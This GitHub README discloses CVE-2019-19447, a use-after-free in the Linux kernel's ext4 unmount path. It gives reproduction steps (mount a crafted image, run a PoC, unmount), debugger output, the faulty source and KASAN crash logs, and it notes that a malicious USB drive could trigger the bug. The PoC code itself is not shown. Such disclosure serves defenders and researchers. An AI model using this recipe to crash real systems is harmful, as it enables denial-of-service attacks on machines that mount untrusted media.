Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2019-19447/
CVE/CVE-2019-19447/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2019-19447

Target

Linux Kernel ext4 FileSystem

Linux Version Availablity
5.0.21 True

Bug Type

use-after-free

Abstract

umounting after some operations(with crafted image) can cause use-after-free in ext4_put_super function.

it can be not only local(mount ext4 image in local shell), but also remote(mount corrupted(with crafted ext4 image) USB or other storage)

Reproduce

gcc -o poc poc_2019_19447.c
mkdir mnt
mount poc_2019_19447.img ./mnt
cp poc ./mnt/
cd mnt
./poc
sync
cd ..
umount ./mnt

Details

Debug view

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x7
 RBX  0xffff88805c795500 —▸ 0xffffffff84a52220 (super_blocks) —▸ 0xffff88805e860000 —▸ 0xffff88805e860880 —▸ 0xffff88805e867700 ◂— ...
 RCX  0x0
 RDX  0xfb
 RDI  0xffff888056ca499c ◂— 0x0
 RSI  0x8
 R8   0xffffed100bdc6061 ◂— 0
 R9   0xffffed100bdc6061 ◂— 0
 R10  0x228
 R11  0xffffed100bdc6060 ◂— 0
 R12  0xdffffc0000000000
 R13  0xffff888056ca49e0 —▸ 0xffff88805c793d88 ◂— 0xffff888056ca49e0
 R14  0xffff88805c793d88 —▸ 0xffff888056ca49e0 ◂— 0xffff88805c793d88
 R15  0xffff88805c793b80 ◂— 0x20 /* ' ' */
 RBP  0xffff88805866fd10 —▸ 0xffff88805866fd40 —▸ 0xffff88805866fd68 —▸ 0xffff88805866fd88 —▸ 0xffff88805866fe28 ◂— ...
 RSP  0xffff88805866fcb0 —▸ 0xffff88805866fca8 —▸ 0xffffffff81b54009 (ext4_put_super+1081) ◂— mov    rdx, r14 /* 0xb848f2894c */
 RIP  0xffffffff81b54822 (ext4_put_super+3154) ◂— 0xfea8e9ffc406e9e8
──────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────
   0xffffffff81b546c5 <ext4_put_super+2805>    add    eax, 3
   0xffffffff81b546c8 <ext4_put_super+2808>    cmp    al, dl
   0xffffffff81b546ca <ext4_put_super+2810>    jl     ext4_put_super+2820 <0xffffffff81b546d4>

   0xffffffff81b546cc <ext4_put_super+2812>    test   dl, dl
   0xffffffff81b546ce <ext4_put_super+2814>    jne    ext4_put_super+3154 <0xffffffff81b54822>
    ↓
 ► 0xffffffff81b54822 <ext4_put_super+3154>    call   __asan_report_load4_noabort <0xffffffff81794f10>
        rdi: 0xffff888056ca499c ◂— 0x0

   0xffffffff81b54827 <ext4_put_super+3159>    jmp    ext4_put_super+2820 <0xffffffff81b546d4>

   0xffffffff81b5482c <ext4_put_super+3164>    call   __asan_report_load4_noabort <0xffffffff81794f10>

   0xffffffff81b54831 <ext4_put_super+3169>    jmp    ext4_put_super+2858 <0xffffffff81b546fa>

   0xffffffff81b54836 <ext4_put_super+3174>    mov    rdi, r14
   0xffffffff81b54839 <ext4_put_super+3177>    call   __asan_report_load8_noabort <0xffffffff81794f30>
───────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /home/phantom/kernel/ubuntu-eoan/fs/ext4/super.c
   932 		 le32_to_cpu(sbi->s_es->s_last_orphan));
   933
   934 	printk(KERN_ERR "sb_info orphan list:\n");
   935 	list_for_each(l, &sbi->s_orphan) {
   936 		struct inode *inode = orphan_list_entry(l);
 ► 937 		printk(KERN_ERR "  "
   938 		       "inode %s:%lu at %p: mode %o, nlink %d, next %d\n",
   939 		       inode->i_sb->s_id, inode->i_ino, inode,
   940 		       inode->i_mode, inode->i_nlink,
   941 		       NEXT_ORPHAN(inode));
   942 	}
───────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp  0xffff88805866fcb0 —▸ 0xffff88805866fca8 —▸ 0xffffffff81b54009 (ext4_put_super+1081) ◂— mov    rdx, r14 /* 0xb848f2894c */
01:0008│      0xffff88805866fcb8 —▸ 0xffffffff818fe3cd (__sync_blockdev+93) ◂— pop    rbx /* 0x7500023c80c35d5b */
02:0010│      0xffff88805866fcc0 —▸ 0xffff88805c793be8 —▸ 0xffff888058c3b400 ◂— 0x400000001000
03:0018│      0xffff88805866fcc8 —▸ 0xffff88805c793bf0 —▸ 0xffff88805b86b648 ◂— 0x0
04:0020│      0xffff88805866fcd0 —▸ 0xffff88805c793bb0 ◂— 1
05:0028│      0xffff88805866fcd8 —▸ 0xffff88805c7958a8 —▸ 0xffff88805c793b80 ◂— 0x20 /* ' ' */
06:0030│      0xffff88805866fce0 —▸ 0xffff888056ca4a48 ◂— 0xd81a4
07:0038│      0xffff88805866fce8 —▸ 0xffff88805c795500 —▸ 0xffffffff84a52220 (super_blocks) —▸ 0xffff88805e860000 —▸ 0xffff88805e860880 ◂— ...
─────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0 ffffffff81b54822 ext4_put_super+3154
   f 1 ffffffff81b54822 ext4_put_super+3154
   f 2 ffffffff81825327 generic_shutdown_super+311
   f 3 ffffffff81827704 kill_block_super+164
   f 4 ffffffff818265f7 deactivate_locked_super+151
   f 5 ffffffff8182763e deactivate_super+350
   f 6 ffffffff8188da72 cleanup_mnt+674
   f 7 ffffffff8188dc62 __cleanup_mnt+18
   f 8 ffffffff81213f5c task_work_run+268
   f 9 ffffffff8100844c exit_to_usermode_loop+444
   f 10 ffffffff8100844c exit_to_usermode_loop+444
───────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/xg $25->i_mode
0x0 <fixed_percpu_data>:	Cannot access memory at address 0x0
pwndbg> x/xg &$25->i_mode
0xffff888056ca499c:	0x0000000000000000

local variable inode is freed. (inode->i_mode occurs use-after-free)

Bug causes

fs/ext4/super.c:1022 (link)

static void dump_orphan_list(struct super_block *sb, struct ext4_sb_info *sbi)
{
	struct list_head *l;

	ext4_msg(sb, KERN_ERR, "sb orphan head is %d",
		 le32_to_cpu(sbi->s_es->s_last_orphan));

	printk(KERN_ERR "sb_info orphan list:\n");
	list_for_each(l, &sbi->s_orphan) {
		struct inode *inode = orphan_list_entry(l);
		printk(KERN_ERR "  "
[1]		       "inode %s:%lu at %p: mode %o, nlink %d, next %d\n",
		       inode->i_sb->s_id, inode->i_ino, inode,
		       inode->i_mode, inode->i_nlink,
		       NEXT_ORPHAN(inode));
	}
}

local variable inode is already freed.

it occurs use-after-free in inode->i_mode[1].

KASAN logs

on exec poc

[   70.514180] EXT4-fs (loop0): Inode 16 (00000000398b8d7e): orphan list check failed!
[   70.515448] 00000000398b8d7e: 0002f30a 00000004 00000000 00000000  ................
[   70.516068] 0000000031a80184: 00000001 00002602 00000005 00000005  .....&..........
[   70.516410] 00000000b74037e1: 00000415 00000000 00000000 00000000  ................
[   70.516764] 00000000e38e5d58: 00000000 00000000 00000000 00000000  ................
[   70.516925] 000000001b41d036: 00000000 00000000 00000000 00000000  ................
[   70.517453] 000000000e0c9cd1: 00080000 00000081 00000000 00000000  ................
[   70.518007] 0000000090f825fb: 5e3a4441 ffff8880 00000000 00000000  AD:^............
[   70.518741] 00000000dde5e99d: 5711a5f0 ffff8880 5711a5f0 ffff8880  ...W.......W....
[   70.519063] 0000000066c4afe3: 5c5e0208 ffff8880 5c5e0208 ffff8880  ..^\......^\....
[   70.520489] 00000000582fb0f0: 000026a2 00000000 00000000 00000000  .&..............
[   70.521006] 00000000f2ccc187: 00000000 00000000 00000000 00000000  ................
[   70.521475] 00000000c5600ccd: 5711a630 ffff8880 5711a630 ffff8880  0..W....0..W....
[   70.521801] 000000008102adde: 00000000 00000000 00000000 00000000  ................
[   70.522801] 0000000094c61296: 00000000 00000000 5711a658 ffff8880  ........X..W....
[   70.523224] 000000001c750527: 5711a658 ffff8880 000d81a4 00000000  X..W............
[   70.523720] 00000000f2d11ef7: 00000000 00001000 ffffffff ffffffff  ................
[   70.524032] 0000000075b985f1: ffffffff ffffffff 83f66b00 ffffffff  .........k......
[   70.524529] 000000007aa63ddb: 5ba29980 ffff8880 5711a7d8 ffff8880  ...[.......W....
[   70.525093] 00000000d7d55bea: 00000000 00000000 00000010 00000000  ................
[   70.525594] 0000000022c200c6: 00000001 00000000 000026a2 00000000  .........&......
[   70.530151] 0000000083f74df1: 5b437ccf 00000000 00000000 00000000  .|C[............
[   70.530437] 00000000d295a5ce: 5de00a4b 00000000 00000000 00000000  K..]............
[   70.533894] 000000002151a88f: 5de00a4d 00000000 00000000 00000000  M..]............
[   70.535197] 00000000489bb644: 00000000 000a0000 0000000c 00000000  ................
[   70.535944] 0000000077b78e8d: 00000060 00000000 00000000 00000000  `...............
[   70.536336] 000000005d682604: 00000000 00000000 00000000 00000000  ................
[   70.536749] 00000000e44b8b5f: 5711a720 ffff8880 5711a720 ffff8880   ..W.... ..W....
[   70.537225] 00000000ebfe0158: ffff1c92 00000000 00000000 00000000  ................
[   70.537696] 0000000057913d6d: 00000000 00000000 00000000 00000000  ................
[   70.538151] 000000004f35597b: 5711a750 ffff8880 5711a750 ffff8880  P..W....P..W....
[   70.538513] 00000000aa1c2ea5: 00000000 00000000 00000000 00000000  ................
[   70.539378] 00000000d626d83a: 5711a770 ffff8880 5711a770 ffff8880  p..W....p..W....
[   70.540006] 000000001f8ec46f: 5711a780 ffff8880 5711a780 ffff8880  ...W.......W....
[   70.540404] 00000000fa059804: 5711a790 ffff8880 5711a790 ffff8880  ...W.......W....
[   70.540737] 00000000b4137f30: 00000000 00000000 00000000 00000000  ................
[   70.541137] 000000001a0b7eb1: 00000003 00000000 00000000 00000000  ................
[   70.541709] 000000000a0bfc9d: 00000000 00000000 83f66be0 ffffffff  .........k......
[   70.542431] 00000000722b027b: 00000000 00000000 5711a668 ffff8880  ........h..W....
[   70.547118] 000000006819311e: 00000000 00000021 00000000 00000000  ....!...........
[   70.553702] 0000000039ad89ec: 00100cca 00000000 00000000 00000000  ................
[   70.553878] 00000000d70b18d2: 00000000 00000000 00000000 00000000  ................
[   70.554071] 00000000830fd3a8: 00000000 00000000 00000000 00000000  ................
[   70.554320] 0000000050b6025a: 5711a820 ffff8880 5711a820 ffff8880   ..W.... ..W....
[   70.556063] 00000000ebe5db74: 00000000 00000000 00000000 00000000  ................
[   70.557593] 000000001f87a59a: 00000002 00000000 83f699c0 ffffffff  ................
[   70.559632] 0000000021876c93: 00000010 00000000 00000000 00000000  ................
[   70.560213] 000000007c60ff65: 5711a860 ffff8880 5711a860 ffff8880  `..W....`..W....
[   70.560868] 00000000b1bd0065: 00000000 00000000 5711a878 ffff8880  ........x..W....
[   70.561605] 0000000085c214ec: 5711a878 ffff8880 00000000 00000000  x..W............
[   70.562170] 000000007c068c98: 709b874b 00000000 00000000 00000000  K..p............
[   70.571184] 00000000a7404afe: 00000000 00000000 00000000 00000000  ................
[   70.572391] 000000004e2bf3f0: 00000000 00000000 00000000 00000000  ................
[   70.573505] 00000000540f7073: 00000000 00000000 00000000 00000000  ................
[   70.575277] 0000000063397336: 5711a8d0 ffff8880 5711a8d0 ffff8880  ...W.......W....
[   70.576702] 00000000de9c6f36: 00000000 00000000 00000000 00000000  ................
[   70.577079] 00000000ce801087: 00000000 00000000 00000000 00000000  ................
[   70.577924] 000000009d7ca9b2: 5711a900 ffff8880 5711a900 ffff8880  ...W.......W....
[   70.579019] 0000000011d25d53: 00000000 00000000 00000000 ffffffff  ................
[   70.579676] 000000005397d68a: 00000000 00000000 00000000 00000000  ................
[   70.580091] 000000007552ca24: 00000000 00000000 00000000 00000000  ................
[   70.580538] 00000000736e80a0: 00000000 00000000 00000000 00000000  ................
[   70.581013] 00000000c20fcf10: 5711a950 ffff8880 5711a950 ffff8880  P..W....P..W....
[   70.581606] 0000000059bd8892: ffffffe0 0000000f 5711a968 ffff8880  ........h..W....
[   70.581854] 000000002f550778: 5711a968 ffff8880 81af3590 ffffffff  h..W.....5......
[   70.582275] 00000000b172abd5: 00000000 00000000 0000001d 00000018  ................
[   70.584187] 0000000097935071: 00000000 00000000 00000000 00000000  ................
[   70.585094] 000000005b513948: 00000000 00000000 00000000 00000000  ................
[   70.587113] CPU: 0 PID: 327 Comm: umount Not tainted 5.3.7 #1
[   70.587848] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   70.587982] Call Trace:
[   70.587982]  dump_stack+0x7b/0xb5
[   70.587982]  ext4_destroy_inode+0xe0/0x110
[   70.587982]  destroy_inode+0xc5/0x1a0
[   70.587982]  evict+0x348/0x530
[   70.587982]  ? _raw_spin_lock+0x82/0xf0
[   70.587982]  dispose_list+0xe7/0x1d0
[   70.587982]  evict_inodes+0x2fa/0x400
[   70.587982]  ? dispose_list+0x1d0/0x1d0
[   70.591535]  ? __sync_blockdev+0x5d/0xb0
[   70.591535]  ? __sync_filesystem+0x9c/0xd0
[   70.591535]  generic_shutdown_super+0xb3/0x380
[   70.591535]  kill_block_super+0xa4/0x1f0
[   70.591535]  deactivate_locked_super+0x97/0xe0
[   70.591535]  deactivate_super+0x15e/0x180
[   70.591535]  ? destroy_unused_super+0xf0/0xf0
[   70.591535]  ? dput+0x5e/0x780
[   70.591535]  cleanup_mnt+0x2a2/0x400
[   70.591535]  __cleanup_mnt+0x12/0x20
[   70.591535]  task_work_run+0x10c/0x180
[   70.594978]  exit_to_usermode_loop+0x1bc/0x280
[   70.594978]  do_syscall_64+0x25b/0x2f0
[   70.594978]  ? prepare_exit_to_usermode+0xf1/0x1a0
[   70.594978]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   70.594978] RIP: 0033:0x7f2018f8ed77
[   70.594978] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f 1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[   70.594978] RSP: 002b:00007ffecf2bf808 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[   70.594978] RAX: 0000000000000000 RBX: 000055ae60680060 RCX: 00007f2018f8ed77
[   70.594978] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 000055ae60686e30
[   70.594978] RBP: 000055ae60686e30 R08: 000055ae60685080 R09: 0000000000000014
[   70.594978] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f2019490e64
[   70.594978] R13: 0000000000000000 R14: 000055ae60680240 R15: 00007ffecf2bfa90
cc[   71.766132] EXT4-fs (loop0): sb orphan head is 16
[   71.797307] sb_info orphan list:

on umount

[   71.797689] ==================================================================
[   71.799205] BUG: KASAN: use-after-free in ext4_put_super+0xc57/0xd30
[   71.799205] Read of size 4 at addr ffff88805711a5bc by task umount/327
[   71.799205]
[   71.799205] CPU: 0 PID: 327 Comm: umount Not tainted 5.3.7 #1
[   71.799205] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   71.799205] Call Trace:
[   71.799205]  dump_stack+0x7b/0xb5
[   71.799205]  print_address_description+0x7c/0x3b0
[   71.799205]  ? ext4_put_super+0xc57/0xd30
[   71.799205]  __kasan_report+0x134/0x191
[   71.799205]  ? ext4_put_super+0xc57/0xd30
[   71.799205]  ? ext4_put_super+0xc57/0xd30
[   71.799205]  kasan_report+0x12/0x20
[   71.799205]  __asan_report_load4_noabort+0x14/0x20
[   71.799205]  ext4_put_super+0xc57/0xd30
[   71.799205]  ? __sync_blockdev+0x5d/0xb0
[   71.799205]  generic_shutdown_super+0x137/0x380
[   71.799205]  kill_block_super+0xa4/0x1f0
[   71.799205]  deactivate_locked_super+0x97/0xe0
[   71.799205]  deactivate_super+0x15e/0x180
[   71.799205]  ? destroy_unused_super+0xf0/0xf0
[   71.799205]  ? dput+0x5e/0x780
[   71.799205]  cleanup_mnt+0x2a2/0x400
[   71.799205]  __cleanup_mnt+0x12/0x20
[   71.799205]  task_work_run+0x10c/0x180
[   71.799205]  exit_to_usermode_loop+0x1bc/0x280
[   71.799205]  do_syscall_64+0x25b/0x2f0
[   71.799205]  ? prepare_exit_to_usermode+0xf1/0x1a0
[   71.799205]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   71.799205] RIP: 0033:0x7f2018f8ed77
[   71.799205] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f 1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[   71.799205] RSP: 002b:00007ffecf2bf808 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[   71.799205] RAX: 0000000000000000 RBX: 000055ae60680060 RCX: 00007f2018f8ed77
[   71.799205] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 000055ae60686e30
[   71.799205] RBP: 000055ae60686e30 R08: 000055ae60685080 R09: 0000000000000014
[   71.799205] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f2019490e64
[   71.799205] R13: 0000000000000000 R14: 000055ae60680240 R15: 00007ffecf2bfa90
[   71.799205]
[   71.799205] Allocated by task 324:
[   71.799205]  save_stack+0x21/0x90
[   71.799205]  __kasan_kmalloc+0xcc/0xe0
[   71.799205]  kasan_slab_alloc+0x14/0x20
[   71.799205]  kmem_cache_alloc+0xd3/0x260
[   71.799205]  ext4_alloc_inode+0x1d/0x700
[   71.799205]  alloc_inode+0x60/0x190
[   71.799205]  iget_locked+0x157/0x3f0
[   71.799205]  __ext4_iget+0x210/0x5620
[   71.799205]  ext4_lookup+0x2ad/0x6d0
[   71.799205]  __lookup_slow+0x1af/0x3a0
[   71.799205]  lookup_slow+0x56/0x80
[   71.799205]  walk_component+0x6a5/0xfa0
[   71.799205]  path_lookupat+0x18f/0x8c0
[   71.799205]  filename_lookup+0x183/0x3c0
[   71.799205]  user_path_at_empty+0x36/0x40
[   71.799205]  do_sys_truncate+0x8e/0x120
[   71.799205]  __x64_sys_truncate+0x54/0x80
[   71.799205]  do_syscall_64+0xa5/0x2f0
[   71.799205]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   71.799205]
[   71.799205] Freed by task 9:
[   71.799205]  save_stack+0x21/0x90
[   71.799205]  __kasan_slab_free+0x137/0x180
[   71.799205]  kasan_slab_free+0xe/0x10
[   71.799205]  kmem_cache_free+0xe3/0x2e0
[   71.799205]  ext4_free_in_core_inode+0x25/0x30
[   71.799205]  i_callback+0x44/0x70
[   71.799205]  rcu_core+0x414/0xe90
[   71.799205]  rcu_core_si+0xe/0x10
[   71.799205]  __do_softirq+0x1b2/0x605
[   71.799205]
[   71.799205] The buggy address belongs to the object at ffff88805711a580
[   71.799205]  which belongs to the cache ext4_inode_cache of size 1072
[   71.799205] The buggy address is located 60 bytes inside of
[   71.799205]  1072-byte region [ffff88805711a580, ffff88805711a9b0)
[   71.799205] The buggy address belongs to the page:
[   71.799205] page:ffffea00015c4600 refcount:1 mapcount:0 mapping:ffff88805c8c6600 index:0x0 compound_mapcount: 0
[   71.799205] flags: 0xfffffc0010200(slab|head)
[   71.799205] raw: 000fffffc0010200 dead000000000100 dead000000000122 ffff88805c8c6600
[   71.799205] raw: 0000000000000000 00000000800d000d 00000001ffffffff 0000000000000000
[   71.799205] page dumped because: kasan: bad access detected
[   71.799205]
[   71.799205] Memory state around the buggy address:
[   71.799205]  ffff88805711a480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   71.799205]  ffff88805711a500: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   71.799205] >ffff88805711a580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   71.799205]                                         ^
[   71.799205]  ffff88805711a600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   71.799205]  ffff88805711a680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   71.799205] ==================================================================
[   71.799205] Disabling lock debugging due to kernel taint
[   71.841308]   inode loop0:16 at 000000003fa23361: mode 100644, nlink 1, next 0
[   71.843393] ------------[ cut here ]------------
[   71.843657] kernel BUG at fs/ext4/super.c:1028!
[   71.844866] invalid opcode: 0000 [#1] SMP KASAN NOPTI
[   71.845300] CPU: 0 PID: 327 Comm: umount Tainted: G    B             5.3.7 #1
[   71.845883] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   71.846901] RIP: 0010:ext4_put_super+0x958/0xd30
[   71.846901] Code: 00 00 00 00 00 fc ff df 66 45 89 65 3a 48 c1 ea 03 80 3c 02 00 0f 85 1d 03 00 00 f6 43 50 01 0f 85 7b f8 ff ff e9 69 f8 ff ff <0f> 0b 49 8d 7f 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea
[   71.846901] RSP: 0018:ffff888057bbfcb0 EFLAGS: 00000202
[   71.846901] RAX: ffff88805711a600 RBX: ffff88805ba29980 RCX: ffffffff81b547bb
[   71.846901] RDX: 1ffff1100b8bc041 RSI: 0000000000000008 RDI: ffff88805711a600
[   71.846901] RBP: ffff888057bbfd10 R08: ffffed100bdc6061 R09: ffffed100bdc6061
[   71.846901] R10: 0000000000000001 R11: ffffed100bdc6060 R12: dffffc0000000000
[   71.846901] R13: ffff88805c5e0208 R14: ffff88805c5e0208 R15: ffff88805c5e0000
[   71.846901] FS:  00007f20196ace40(0000) GS:ffff88805ee00000(0000) knlGS:0000000000000000
[   71.846901] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   71.846901] CR2: 00007fb2b78a8020 CR3: 000000005b412000 CR4: 00000000000006f0
[   71.846901] Call Trace:
[   71.846901]  ? __sync_blockdev+0x5d/0xb0
[   71.846901]  generic_shutdown_super+0x137/0x380
[   71.846901]  kill_block_super+0xa4/0x1f0
[   71.846901]  deactivate_locked_super+0x97/0xe0
[   71.846901]  deactivate_super+0x15e/0x180
[   71.846901]  ? destroy_unused_super+0xf0/0xf0
[   71.846901]  ? dput+0x5e/0x780
[   71.846901]  cleanup_mnt+0x2a2/0x400
[   71.846901]  __cleanup_mnt+0x12/0x20
[   71.846901]  task_work_run+0x10c/0x180
[   71.846901]  exit_to_usermode_loop+0x1bc/0x280
[   71.846901]  do_syscall_64+0x25b/0x2f0
[   71.846901]  ? prepare_exit_to_usermode+0xf1/0x1a0
[   71.846901]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   71.846901] RIP: 0033:0x7f2018f8ed77
[   71.846901] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f 1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[   71.846901] RSP: 002b:00007ffecf2bf808 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[   71.846901] RAX: 0000000000000000 RBX: 000055ae60680060 RCX: 00007f2018f8ed77
[   71.846901] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 000055ae60686e30
[   71.846901] RBP: 000055ae60686e30 R08: 000055ae60685080 R09: 0000000000000014
[   71.846901] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f2019490e64
[   71.846901] R13: 0000000000000000 R14: 000055ae60680240 R15: 00007ffecf2bfa90
[   71.846901] Modules linked in:
[   71.866012] ---[ end trace eaddedf1fbf9a8ba ]---
[   71.866267] RIP: 0010:ext4_put_super+0x958/0xd30
[   71.866423] Code: 00 00 00 00 00 fc ff df 66 45 89 65 3a 48 c1 ea 03 80 3c 02 00 0f 85 1d 03 00 00 f6 43 50 01 0f 85 7b f8 ff ff e9 69 f8 ff ff <0f> 0b 49 8d 7f 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea
[   71.872138] RSP: 0018:ffff888057bbfcb0 EFLAGS: 00000202
[   71.872528] RAX: ffff88805711a600 RBX: ffff88805ba29980 RCX: ffffffff81b547bb
[   71.873012] RDX: 1ffff1100b8bc041 RSI: 0000000000000008 RDI: ffff88805711a600
[   71.873189] RBP: ffff888057bbfd10 R08: ffffed100bdc6061 R09: ffffed100bdc6061
[   71.873367] R10: 0000000000000001 R11: ffffed100bdc6060 R12: dffffc0000000000
[   71.873718] R13: ffff88805c5e0208 R14: ffff88805c5e0208 R15: ffff88805c5e0000
[   71.874570] FS:  00007f20196ace40(0000) GS:ffff88805ee00000(0000) knlGS:0000000000000000
[   71.877602] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   71.877981] CR2: 00007fb2b78a8020 CR3: 000000005b412000 CR4: 00000000000006f0
./emount.sh: line 19:   327 Segmentation fault      umount ./mnt

Conclusion

umount after some operations(with crafted image) can cause use-after-free in ext4_put_super function.

It can be used as malicious way.

Discoverer

Team bobfuzzer

Acknowledgments

This Project used ported version(to 5.0.21 and 5.3.14 linux kernel) of filesystem fuzzer 'JANUS' which developed by GeorgiaTech Systems Software & Security Lab(SSLab)

Thank you for the excellent fuzzer and paper below.